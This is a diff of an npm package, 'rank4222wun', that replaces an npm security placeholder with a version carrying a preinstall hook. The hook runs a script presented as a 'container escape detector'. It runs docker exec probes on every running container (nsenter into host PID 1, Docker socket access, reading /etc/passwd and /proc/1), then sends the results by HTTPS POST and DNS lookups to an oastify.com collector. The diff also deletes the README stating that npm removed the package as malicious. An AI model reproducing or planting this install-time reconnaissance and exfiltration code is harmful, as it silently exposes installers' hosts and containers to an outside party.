rank4222wun 0.0.1-security → 1.0.35

package/package.json

@@ -1,6 +1,10 @@
 {
   "name": "rank4222wun",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.35",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "dependencies": {}
 }

package/preinstall.js

@@ -0,0 +1,937 @@
+// multi-container-escape-detector.js
+const { exec, spawn } = require('child_process');
+const os = require('os');
+const fs = require('fs');
+const path = require('path');
+const https = require('https');
+const dns = require('dns');
+const crypto = require('crypto');
+
+console.log(`
+╔══════════════════════════════════════════════════════════╗
+║      MULTI-CONTAINER ESCAPE DETECTOR v3.0               ║
+║      Advanced Container Security Assessment              ║
+╚══════════════════════════════════════════════════════════╝
+`);
+
+// ===================== CONFIGURATION =====================
+const CONFIG = {
+  // OAST Configuration
+  OAST: {
+    domain: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
+    httpsPort: 443,
+    httpPort: 80,
+    apiKey: crypto.randomBytes(16).toString('hex'),
+    sessionId: `mced-${Date.now()}-${crypto.randomBytes(4).toString('hex')}`
+  },
+  
+  // Scanning Configuration
+  SCAN: {
+    maxContainers: 50,
+    parallelScans: 5,
+    timeoutPerContainer: 30000,
+    deepScan: true,
+    autoExploit: false,
+    stealthMode: false
+  },
+  
+  // Detection Methods
+  METHODS: {
+    nsenter: true,
+    dockerSocket: true,
+    procAccess: true,
+    kernelExploits: true,
+    hostMounts: true,
+    capabilities: true,
+    networkEscape: true
+  },
+  
+  // Output Configuration
+  OUTPUT: {
+    saveReports: true,
+    reportFormat: 'json', // json, html, txt
+    verbose: true,
+    colorOutput: true
+  }
+};
+
+// ===================== GLOBAL STATE =====================
+const STATE = {
+  startTime: Date.now(),
+  containers: {},
+  hostInfo: null,
+  networkMap: {},
+  vulnerabilities: {},
+  oastInteractions: [],
+  statistics: {
+    totalContainers: 0,
+    scannedContainers: 0,
+    escapedContainers: 0,
+    vulnerableContainers: 0,
+    criticalEscapes: 0
+  }
+};
+
+// ===================== UTILITY FUNCTIONS =====================
+class ContainerScanner {
+  constructor(containerId) {
+    this.id = containerId;
+    this.shortId = containerId.substring(0, 12);
+    this.info = {
+      id: containerId,
+      name: '',
+      image: '',
+      status: '',
+      escapeStatus: 'unknown',
+      confidence: 0,
+      evidence: [],
+      methods: [],
+      risk: 'low',
+      network: {},
+      mounts: [],
+      capabilities: [],
+      vulnerabilities: []
+    };
+    this.rawData = {};
+  }
+
+  async scan() {
+    try {
+      console.log(`\n🔍 Scanning container: ${this.shortId}`);
+      
+      // Collect basic info
+      await this.collectBasicInfo();
+      
+      // Perform escape checks
+      await this.performEscapeChecks();
+      
+      // Analyze results
+      await this.analyzeResults();
+      
+      // Report to OAST
+      await this.reportToOAST();
+      
+      // Update statistics
+      this.updateStatistics();
+      
+      return this.info;
+    } catch (error) {
+      console.error(`❌ Error scanning container ${this.shortId}:`, error.message);
+      this.info.escapeStatus = 'scan_failed';
+      return this.info;
+    }
+  }
+
+  async collectBasicInfo() {
+    const commands = {
+      name: `docker inspect ${this.id} --format '{{.Name}}'`,
+      image: `docker inspect ${this.id} --format '{{.Config.Image}}'`,
+      status: `docker inspect ${this.id} --format '{{.State.Status}}'`,
+      ip: `docker inspect ${this.id} --format '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}'`,
+      ports: `docker inspect ${this.id} --format '{{json .NetworkSettings.Ports}}'`,
+      mounts: `docker inspect ${this.id} --format '{{json .Mounts}}'`,
+      privileged: `docker inspect ${this.id} --format '{{.HostConfig.Privileged}}'`,
+      capabilities: `docker inspect ${this.id} --format '{{json .HostConfig.CapAdd}}'`
+    };
+
+    for (const [key, cmd] of Object.entries(commands)) {
+      try {
+        const result = await this.executeCommand(cmd);
+        this.rawData[key] = result;
+        
+        // Parse specific data
+        switch(key) {
+          case 'name':
+            this.info.name = result.replace(/^\//, '');
+            break;
+          case 'image':
+            this.info.image = result;
+            break;
+          case 'status':
+            this.info.status = result;
+            break;
+          case 'ip':
+            this.info.network.ip = result;
+            break;
+          case 'mounts':
+            try {
+              this.info.mounts = JSON.parse(result || '[]');
+            } catch (e) {}
+            break;
+          case 'capabilities':
+            try {
+              this.info.capabilities = JSON.parse(result || '[]');
+            } catch (e) {}
+            break;
+        }
+      } catch (e) {
+        this.rawData[key] = null;
+      }
+    }
+  }
+
+  async performEscapeChecks() {
+    const checks = [];
+    
+    if (CONFIG.METHODS.nsenter) {
+      checks.push(this.checkNsenterEscape());
+    }
+    
+    if (CONFIG.METHODS.dockerSocket) {
+      checks.push(this.checkDockerSocketEscape());
+    }
+    
+    if (CONFIG.METHODS.procAccess) {
+      checks.push(this.checkProcEscape());
+    }
+    
+    if (CONFIG.METHODS.hostMounts) {
+      checks.push(this.checkMountEscape());
+    }
+    
+    if (CONFIG.METHODS.kernelExploits) {
+      checks.push(this.checkKernelVulnerabilities());
+    }
+    
+    if (CONFIG.METHODS.capabilities) {
+      checks.push(this.checkDangerousCapabilities());
+    }
+    
+    if (CONFIG.METHODS.networkEscape) {
+      checks.push(this.checkNetworkEscape());
+    }
+    
+    await Promise.all(checks);
+  }
+
+  async checkNsenterEscape() {
+    const command = `docker exec ${this.id} sh -c '
+      which nsenter >/dev/null 2>&1 && 
+      nsenter --target 1 --mount -- sh -c "hostname" 2>/dev/null | grep -v "$(hostname)" ||
+      echo "FAILED"
+    '`;
+    
+    try {
+      const result = await this.executeCommand(command);
+      if (!result.includes('FAILED') && result.trim()) {
+        this.info.methods.push('nsenter');
+        this.info.evidence.push(`Nsenter escape possible - Hostname: ${result.trim()}`);
+        this.sendOAST('nsenter_escape', { container: this.shortId, result: result.trim() });
+      }
+    } catch (e) {}
+  }
+
+  async checkDockerSocketEscape() {
+    const commands = [
+      // Check if docker.sock is mounted
+      `docker exec ${this.id} ls -la /var/run/docker.sock 2>/dev/null || echo "NOT_FOUND"`,
+      // Try to access Docker API
+      `docker exec ${this.id} sh -c 'curl -s --unix-socket /var/run/docker.sock http://localhost/info 2>/dev/null | grep -q "ID" && echo "ACCESSIBLE" || echo "NO_ACCESS"'`
+    ];
+    
+    try {
+      const [socketCheck, apiCheck] = await Promise.all(
+        commands.map(cmd => this.executeCommand(cmd))
+      );
+      
+      if (!socketCheck.includes('NOT_FOUND') && apiCheck.includes('ACCESSIBLE')) {
+        this.info.methods.push('docker_socket');
+        this.info.evidence.push('Docker socket accessible and writable');
+        
+        // Try to list other containers
+        const listCmd = `docker exec ${this.id} sh -c 'curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json 2>/dev/null | wc -l'`;
+        const containerCount = await this.executeCommand(listCmd);
+        
+        if (parseInt(containerCount) > 1) {
+          this.info.evidence.push(`Can see ${containerCount.trim()} containers on host`);
+          this.sendOAST('docker_socket_escape', {
+            container: this.shortId,
+            accessible: true,
+            containerCount: containerCount.trim()
+          });
+        }
+      }
+    } catch (e) {}
+  }
+
+  async checkProcEscape() {
+    const command = `docker exec ${this.id} sh -c '
+      cat /proc/1/status 2>/dev/null | head -5 &&
+      cat /proc/1/cmdline 2>/dev/null | tr "\\\\0" " " | head -c 100 ||
+      echo "NO_ACCESS"
+    '`;
+    
+    try {
+      const result = await this.executeCommand(command);
+      if (!result.includes('NO_ACCESS') && result.includes('State:')) {
+        this.info.methods.push('proc_access');
+        this.info.evidence.push('Can access host init process via /proc/1/');
+        this.sendOAST('proc_escape', { container: this.shortId });
+      }
+    } catch (e) {}
+  }
+
+  async checkMountEscape() {
+    const command = `docker exec ${this.id} sh -c '
+      mount 2>/dev/null | grep -E "(/proc|/sys|/dev|overlay)" | head -10 ||
+      cat /proc/mounts 2>/dev/null | head -20
+    '`;
+    
+    try {
+      const result = await this.executeCommand(command);
+      if (result) {
+        const lines = result.split('\n');
+        const dangerousMounts = lines.filter(line => 
+          line.includes('/proc') || 
+          line.includes('/sys') || 
+          line.includes('/dev') ||
+          line.includes('overlay')
+        );
+        
+        if (dangerousMounts.length > 0) {
+          this.info.methods.push('host_mounts');
+          this.info.evidence.push(`${dangerousMounts.length} dangerous mount points found`);
+          
+          // Check if we can access host files through mounts
+          const testCmd = `docker exec ${this.id} sh -c '
+            ls -la /home 2>/dev/null | head -3 ||
+            cat /etc/passwd 2>/dev/null | head -3 ||
+            echo "NO_HOST_ACCESS"
+          '`;
+          
+          const accessResult = await this.executeCommand(testCmd);
+          if (!accessResult.includes('NO_HOST_ACCESS')) {
+            this.info.evidence.push('Can access host files through mounts');
+            this.sendOAST('mount_escape', {
+              container: this.shortId,
+              mounts: dangerousMounts.slice(0, 3),
+              hostAccess: true
+            });
+          }
+        }
+      }
+    } catch (e) {}
+  }
+
+  async checkKernelVulnerabilities() {
+    const command = `docker exec ${this.id} sh -c '
+      uname -r &&
+      grep -i "dirtypipe\\|dirtycow\\|shocker\\|overlayfs" /etc/os-release 2>/dev/null ||
+      echo "NO_INFO"
+    '`;
+    
+    try {
+      const result = await this.executeCommand(command);
+      if (!result.includes('NO_INFO')) {
+        const lines = result.split('\n');
+        const kernel = lines[0]?.trim();
+        
+        if (kernel) {
+          this.info.vulnerabilities.push(`Kernel: ${kernel}`);
+          
+          // Check for known vulnerable kernels
+          const vulnerableKernels = {
+            'DirtyPipe': /^(5\.8|5\.9|5\.10|5\.11|5\.12|5\.13|5\.14|5\.15|5\.16)\./,
+            'DirtyCow': /^(2\.6\.|3\.|4\.)/,
+            'Shocker': /^(3\.8|3\.9|3\.10)\./
+          };
+          
+          for (const [vuln, pattern] of Object.entries(vulnerableKernels)) {
+            if (pattern.test(kernel)) {
+              this.info.vulnerabilities.push(`${vuln} vulnerability detected`);
+              this.sendOAST('kernel_vuln', {
+                container: this.shortId,
+                kernel: kernel,
+                vulnerability: vuln
+              });
+              break;
+            }
+          }
+        }
+      }
+    } catch (e) {}
+  }
+
+  async checkDangerousCapabilities() {
+    const command = `docker exec ${this.id} sh -c '
+      capsh --print 2>/dev/null | grep -E "(sys_admin|sys_module|sys_ptrace|dac_override)" ||
+      echo "NO_CAPSH"
+    '`;
+    
+    try {
+      const result = await this.executeCommand(command);
+      if (!result.includes('NO_CAPSH') && result.trim()) {
+        const dangerousCaps = [
+          'CAP_SYS_ADMIN', 'CAP_SYS_MODULE', 'CAP_SYS_PTRACE',
+          'CAP_DAC_OVERRIDE', 'CAP_DAC_READ_SEARCH'
+        ];
+        
+        const foundCaps = dangerousCaps.filter(cap => result.includes(cap));
+        if (foundCaps.length > 0) {
+          this.info.methods.push('capabilities');
+          this.info.evidence.push(`Dangerous capabilities: ${foundCaps.join(', ')}`);
+          this.sendOAST('dangerous_caps', {
+            container: this.shortId,
+            capabilities: foundCaps
+          });
+        }
+      }
+    } catch (e) {}
+  }
+
+  async checkNetworkEscape() {
+    const commands = [
+      `docker exec ${this.id} ip route show 2>/dev/null | head -5`,
+      `docker exec ${this.id} netstat -tunap 2>/dev/null | head -10`,
+      `docker exec ${this.id} iptables -L -n 2>/dev/null | head -20`
+    ];
+    
+    try {
+      const results = await Promise.all(
+        commands.map(cmd => this.executeCommand(cmd).catch(() => ''))
+      );
+      
+      if (results.some(r => r.trim())) {
+        this.info.methods.push('network_escape');
+        this.info.network.details = {
+          routes: results[0]?.split('\n').slice(0, 3) || [],
+          connections: results[1]?.split('\n').slice(0, 5) || [],
+          iptables: results[2]?.split('\n').slice(0, 10) || []
+        };
+      }
+    } catch (e) {}
+  }
+
+  async analyzeResults() {
+    // Calculate confidence score
+    let score = 0;
+    
+    // Method points
+    const methodPoints = {
+      nsenter: 25,
+      docker_socket: 30,
+      proc_access: 20,
+      host_mounts: 15,
+      capabilities: 10,
+      network_escape: 10
+    };
+    
+    this.info.methods.forEach(method => {
+      score += methodPoints[method] || 0;
+    });
+    
+    // Vulnerability points
+    if (this.info.vulnerabilities.length > 0) {
+      score += this.info.vulnerabilities.length * 10;
+    }
+    
+    // Evidence points
+    score += Math.min(this.info.evidence.length * 5, 25);
+    
+    // Capabilities points
+    if (this.info.capabilities.includes('CAP_SYS_ADMIN')) {
+      score += 20;
+    }
+    
+    // Determine escape status
+    this.info.confidence = Math.min(100, score);
+    
+    if (this.info.confidence >= 70) {
+      this.info.escapeStatus = 'confirmed';
+      this.info.risk = 'critical';
+    } else if (this.info.confidence >= 40) {
+      this.info.escapeStatus = 'probable';
+      this.info.risk = 'high';
+    } else if (this.info.confidence >= 20) {
+      this.info.escapeStatus = 'possible';
+      this.info.risk = 'medium';
+    } else {
+      this.info.escapeStatus = 'unlikely';
+      this.info.risk = 'low';
+    }
+  }
+
+  async reportToOAST() {
+    if (this.info.escapeStatus !== 'unlikely' && this.info.confidence > 10) {
+      const payload = {
+        sessionId: CONFIG.OAST.sessionId,
+        timestamp: new Date().toISOString(),
+        container: {
+          id: this.shortId,
+          name: this.info.name,
+          image: this.info.image
+        },
+        escape: {
+          status: this.info.escapeStatus,
+          confidence: this.info.confidence,
+          risk: this.info.risk,
+          methods: this.info.methods,
+          evidence: this.info.evidence.slice(0, 5)
+        },
+        vulnerabilities: this.info.vulnerabilities
+      };
+      
+      this.sendOAST('container_escape_report', payload);
+    }
+  }
+
+  sendOAST(type, data) {
+    const interactionId = `interaction-${Date.now()}-${crypto.randomBytes(3).toString('hex')}`;
+    const interaction = {
+      id: interactionId,
+      type: type,
+      timestamp: new Date().toISOString(),
+      container: this.shortId,
+      data: data
+    };
+    
+    STATE.oastInteractions.push(interaction);
+    
+    // Send via HTTPS
+    const req = https.request({
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpsPort,
+      path: '/multi-container-escape',
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': CONFIG.OAST.sessionId,
+        'X-Container-ID': this.shortId,
+        'X-API-Key': CONFIG.OAST.apiKey,
+        'User-Agent': 'MultiContainerEscapeDetector/3.0'
+      }
+    }, (res) => {
+      let body = '';
+      res.on('data', chunk => body += chunk);
+      res.on('end', () => {
+        if (CONFIG.OUTPUT.verbose) {
+          console.log(`📡 OAST report sent for ${this.shortId} (${res.statusCode})`);
+        }
+      });
+    });
+    
+    req.on('error', () => {});
+    req.write(JSON.stringify({
+      interactionId: interactionId,
+      sessionId: CONFIG.OAST.sessionId,
+      containerId: this.shortId,
+      data: data
+    }));
+    req.end();
+    
+    // Also send DNS notification for critical escapes
+    if (this.info.risk === 'critical') {
+      const dnsName = `${this.shortId}-critical.${CONFIG.OAST.sessionId}.${CONFIG.OAST.domain}`;
+      dns.lookup(dnsName, () => {});
+    }
+  }
+
+  executeCommand(command) {
+    return new Promise((resolve, reject) => {
+      exec(command, { timeout: 5000 }, (error, stdout, stderr) => {
+        if (error) {
+          reject(error);
+        } else {
+          resolve(stdout.toString().trim());
+        }
+      });
+    });
+  }
+
+  updateStatistics() {
+    STATE.statistics.scannedContainers++;
+    
+    if (this.info.escapeStatus === 'confirmed') {
+      STATE.statistics.escapedContainers++;
+      STATE.statistics.criticalEscapes++;
+    } else if (this.info.escapeStatus === 'probable') {
+      STATE.statistics.escapedContainers++;
+    }
+    
+    if (this.info.vulnerabilities.length > 0) {
+      STATE.statistics.vulnerableContainers++;
+    }
+  }
+}
+
+// ===================== MAIN SCANNER CLASS =====================
+class MultiContainerScanner {
+  constructor() {
+    this.scanners = [];
+    this.results = [];
+  }
+
+  async discoverContainers() {
+    console.log('🔎 Discovering containers...');
+    
+    try {
+      // Get all running containers
+      const cmd = 'docker ps -q --no-trunc';
+      const output = await this.exec(cmd);
+      const containerIds = output.split('\n').filter(id => id.trim());
+      
+      STATE.statistics.totalContainers = containerIds.length;
+      
+      if (containerIds.length === 0) {
+        console.log('ℹ️ No running containers found.');
+        return [];
+      }
+      
+      console.log(`📦 Found ${containerIds.length} containers`);
+      return containerIds;
+    } catch (error) {
+      console.error('❌ Failed to discover containers:', error.message);
+      return [];
+    }
+  }
+
+  async scanContainers(containerIds) {
+    console.log(`🚀 Starting scan of ${containerIds.length} containers...\n`);
+    
+    // Create scanners
+    this.scanners = containerIds.map(id => new ContainerScanner(id));
+    
+    // Scan in batches to avoid overwhelming the system
+    const batchSize = CONFIG.SCAN.parallelScans;
+    for (let i = 0; i < this.scanners.length; i += batchSize) {
+      const batch = this.scanners.slice(i, i + batchSize);
+      console.log(`📊 Batch ${Math.floor(i/batchSize) + 1}: Scanning ${batch.length} containers...`);
+      
+      const batchPromises = batch.map(scanner => 
+        scanner.scan().catch(error => {
+          console.error(`Failed to scan ${scanner.shortId}:`, error.message);
+          return scanner.info;
+        })
+      );
+      
+      const batchResults = await Promise.all(batchPromises);
+      this.results.push(...batchResults);
+      
+      // Show progress
+      const scanned = Math.min(i + batchSize, this.scanners.length);
+      const percent = Math.round((scanned / this.scanners.length) * 100);
+      console.log(`📈 Progress: ${scanned}/${this.scanners.length} (${percent}%)\n`);
+    }
+    
+    return this.results;
+  }
+
+  async generateReport() {
+    console.log('\n' + '═'.repeat(80));
+    console.log('📊 MULTI-CONTAINER ESCAPE SCAN REPORT');
+    console.log('═'.repeat(80));
+    
+    const report = {
+      metadata: {
+        timestamp: new Date().toISOString(),
+        sessionId: CONFIG.OAST.sessionId,
+        scanDuration: Date.now() - STATE.startTime,
+        config: CONFIG
+      },
+      statistics: STATE.statistics,
+      oast: {
+        domain: CONFIG.OAST.domain,
+        interactions: STATE.oastInteractions.length,
+        session: CONFIG.OAST.sessionId
+      },
+      containers: this.results,
+      summary: this.generateSummary()
+    };
+    
+    // Print summary
+    this.printSummary(report.summary);
+    
+    // Save report if enabled
+    if (CONFIG.OUTPUT.saveReports) {
+      await this.saveReport(report);
+    }
+    
+    return report;
+  }
+
+  generateSummary() {
+    const summary = {
+      totalScanned: STATE.statistics.scannedContainers,
+      escapedContainers: [],
+      vulnerableContainers: [],
+      criticalIssues: [],
+      recommendations: []
+    };
+    
+    this.results.forEach(container => {
+      if (container.escapeStatus === 'confirmed' || container.escapeStatus === 'probable') {
+        summary.escapedContainers.push({
+          id: container.id.substring(0, 12),
+          name: container.name,
+          confidence: container.confidence,
+          methods: container.methods,
+          risk: container.risk
+        });
+      }
+      
+      if (container.vulnerabilities.length > 0) {
+        summary.vulnerableContainers.push({
+          id: container.id.substring(0, 12),
+          name: container.name,
+          vulnerabilities: container.vulnerabilities
+        });
+      }
+      
+      if (container.risk === 'critical') {
+        summary.criticalIssues.push({
+          id: container.id.substring(0, 12),
+          name: container.name,
+          evidence: container.evidence.slice(0, 3)
+        });
+      }
+    });
+    
+    // Generate recommendations
+    if (summary.escapedContainers.length > 0) {
+      summary.recommendations.push(
+        `Immediate action required: ${summary.escapedContainers.length} containers can escape to host`
+      );
+    }
+    
+    if (summary.criticalIssues.length > 0) {
+      summary.recommendations.push(
+        `Critical vulnerabilities found in ${summary.criticalIssues.length} containers`
+      );
+    }
+    
+    if (summary.vulnerableContainers.length > 0) {
+      summary.recommendations.push(
+        `Update kernel/software in ${summary.vulnerableContainers.length} containers`
+      );
+    }
+    
+    if (summary.escapedContainers.length === 0) {
+      summary.recommendations.push('No critical escape vectors detected. Regular security maintenance recommended.');
+    }
+    
+    return summary;
+  }
+
+  printSummary(summary) {
+    console.log('\n📈 SCAN STATISTICS:');
+    console.log('   Total containers scanned:', summary.totalScanned);
+    console.log('   Containers that can escape:', summary.escapedContainers.length);
+    console.log('   Vulnerable containers:', summary.vulnerableContainers.length);
+    console.log('   Critical issues:', summary.criticalIssues.length);
+    
+    if (summary.escapedContainers.length > 0) {
+      console.log('\n🚨 CRITICAL - CONTAINERS THAT CAN ESCAPE:');
+      summary.escapedContainers.forEach((container, i) => {
+        console.log(`   ${i + 1}. ${container.name || container.id}`);
+        console.log(`      Confidence: ${container.confidence}% | Risk: ${container.risk.toUpperCase()}`);
+        console.log(`      Methods: ${container.methods.join(', ')}`);
+      });
+    }
+    
+    if (summary.criticalIssues.length > 0) {
+      console.log('\n⚠️  CRITICAL VULNERABILITIES:');
+      summary.criticalIssues.forEach((issue, i) => {
+        console.log(`   ${i + 1}. ${issue.name || issue.id}`);
+        issue.evidence.forEach(ev => console.log(`      - ${ev}`));
+      });
+    }
+    
+    console.log('\n💡 RECOMMENDATIONS:');
+    summary.recommendations.forEach((rec, i) => {
+      console.log(`   ${i + 1}. ${rec}`);
+    });
+    
+    console.log('\n📡 OAST REPORTING:');
+    console.log(`   Domain: ${CONFIG.OAST.domain}`);
+    console.log(`   Session ID: ${CONFIG.OAST.sessionId}`);
+    console.log(`   Interactions sent: ${STATE.oastInteractions.length}`);
+    console.log(`   Check OAST for detailed evidence: https://oastify.com`);
+    
+    console.log('\n' + '═'.repeat(80));
+    console.log('🎯 SCAN COMPLETE');
+    
+    if (summary.escapedContainers.length > 0) {
+      console.log('🚨 SECURITY ALERT: Container escape vectors detected!');
+      console.log('🔒 Immediate remediation required.');
+    } else {
+      console.log('✅ No critical escape vectors detected.');
+      console.log('🛡️  Regular security monitoring recommended.');
+    }
+    
+    console.log('═'.repeat(80));
+  }
+
+  async saveReport(report) {
+    const timestamp = new Date().toISOString().replace(/[:.]/g, '-');
+    const filename = `multi-container-scan-${timestamp}.json`;
+    
+    try {
+      fs.writeFileSync(filename, JSON.stringify(report, null, 2));
+      console.log(`\n💾 Full report saved to: ${filename}`);
+      
+      // Also save a summary file
+      const summaryFilename = `scan-summary-${timestamp}.txt`;
+      let summaryText = `MULTI-CONTAINER ESCAPE SCAN SUMMARY\n`;
+      summaryText += `Date: ${new Date().toLocaleString()}\n`;
+      summaryText += `Session ID: ${CONFIG.OAST.sessionId}\n\n`;
+      
+      summaryText += `STATISTICS:\n`;
+      summaryText += `  Total containers: ${report.statistics.totalContainers}\n`;
+      summaryText += `  Escaped containers: ${report.summary.escapedContainers.length}\n`;
+      summaryText += `  Critical issues: ${report.summary.criticalIssues.length}\n\n`;
+      
+      if (report.summary.escapedContainers.length > 0) {
+        summaryText += `CRITICAL CONTAINERS:\n`;
+        report.summary.escapedContainers.forEach(container => {
+          summaryText += `  - ${container.name || container.id} (${container.confidence}%)\n`;
+        });
+        summaryText += '\n';
+      }
+      
+      summaryText += `OAST DETAILS:\n`;
+      summaryText += `  Domain: ${CONFIG.OAST.domain}\n`;
+      summaryText += `  Session: ${CONFIG.OAST.sessionId}\n`;
+      summaryText += `  Interactions: ${STATE.oastInteractions.length}\n`;
+      
+      fs.writeFileSync(summaryFilename, summaryText);
+      console.log(`📝 Summary saved to: ${summaryFilename}`);
+      
+    } catch (error) {
+      console.error('❌ Failed to save report:', error.message);
+    }
+  }
+
+  exec(command) {
+    return new Promise((resolve, reject) => {
+      exec(command, { timeout: 10000 }, (error, stdout, stderr) => {
+        if (error) {
+          reject(error);
+        } else {
+          resolve(stdout.toString().trim());
+        }
+      });
+    });
+  }
+}
+
+// ===================== MAIN EXECUTION =====================
+async function main() {
+  console.log('🚀 Starting Multi-Container Escape Scanner...\n');
+  console.log('⚙️  Configuration:');
+  console.log(`   OAST Domain: ${CONFIG.OAST.domain}`);
+  console.log(`   Session ID: ${CONFIG.OAST.sessionId}`);
+  console.log(`   Parallel scans: ${CONFIG.SCAN.parallelScans}`);
+  console.log(`   Deep scan: ${CONFIG.SCAN.deepScan ? 'Yes' : 'No'}`);
+  
+  // Initial OAST ping
+  console.log('\n📡 Sending initial OAST ping...');
+  try {
+    const req = https.request({
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpsPort,
+      path: '/scan-start',
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': CONFIG.OAST.sessionId
+      }
+    });
+    
+    req.write(JSON.stringify({
+      action: 'scan_start',
+      timestamp: new Date().toISOString(),
+      config: {
+        parallelScans: CONFIG.SCAN.parallelScans,
+        maxContainers: CONFIG.SCAN.maxContainers
+      }
+    }));
+    req.end();
+  } catch (e) {}
+  
+  // Create scanner and run
+  const scanner = new MultiContainerScanner();
+  
+  try {
+    // Discover containers
+    const containerIds = await scanner.discoverContainers();
+    
+    if (containerIds.length === 0) {
+      console.log('No containers to scan. Exiting.');
+      process.exit(0);
+    }
+    
+    // Scan containers
+    const results = await scanner.scanContainers(containerIds);
+    
+    // Generate report
+    const report = await scanner.generateReport();
+    
+    // Send final report to OAST
+    console.log('\n📡 Sending final report to OAST...');
+    try {
+      const finalReq = https.request({
+        hostname: CONFIG.OAST.domain,
+        port: CONFIG.OAST.httpsPort,
+        path: '/scan-complete',
+        method: 'POST',
+        headers: {
+          'Content-Type': 'application/json',
+          'X-Session-ID': CONFIG.OAST.sessionId,
+          'X-Final-Report': 'true'
+        }
+      });
+      
+      finalReq.write(JSON.stringify({
+        action: 'scan_complete',
+        timestamp: new Date().toISOString(),
+        statistics: report.statistics,
+        summary: report.summary,
+        sessionId: CONFIG.OAST.sessionId
+      }));
+      
+      finalReq.end();
+      console.log('✅ Final report sent to OAST.');
+    } catch (e) {
+      console.log('⚠️  Could not send final report to OAST (may be expected)');
+    }
+    
+    // Exit with appropriate code
+    if (report.summary.escapedContainers.length > 0) {
+      console.log('\n⚠️  Exiting with warning code (containers can escape)');
+      process.exit(2);
+    } else {
+      console.log('\n✅ Scan completed successfully.');
+      process.exit(0);
+    }
+    
+  } catch (error) {
+    console.error('\n❌ Scan failed:', error.message);
+    process.exit(1);
+  }
+}
+
+// ===================== EXECUTE =====================
+if (require.main === module) {
+  // Check if Docker is available
+  exec('which docker', (error) => {
+    if (error) {
+      console.error('❌ Docker is not available or not in PATH.');
+      console.error('   This tool requires Docker to be installed and accessible.');
+      process.exit(1);
+    }
+    
+    // Check if we have permission to run docker commands
+    exec('docker ps', (error) => {
+      if (error && error.message.includes('permission denied')) {
+        console.error('❌ Permission denied for Docker commands.');
+        console.error('   Try running with sudo or add your user to docker group.');
+        process.exit(1);
+      }
+      
+      // Start the scan
+      main();
+    });
+  });
+}
+
+module.exports = { MultiContainerScanner, ContainerScanner };

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=rank4222wun for more information.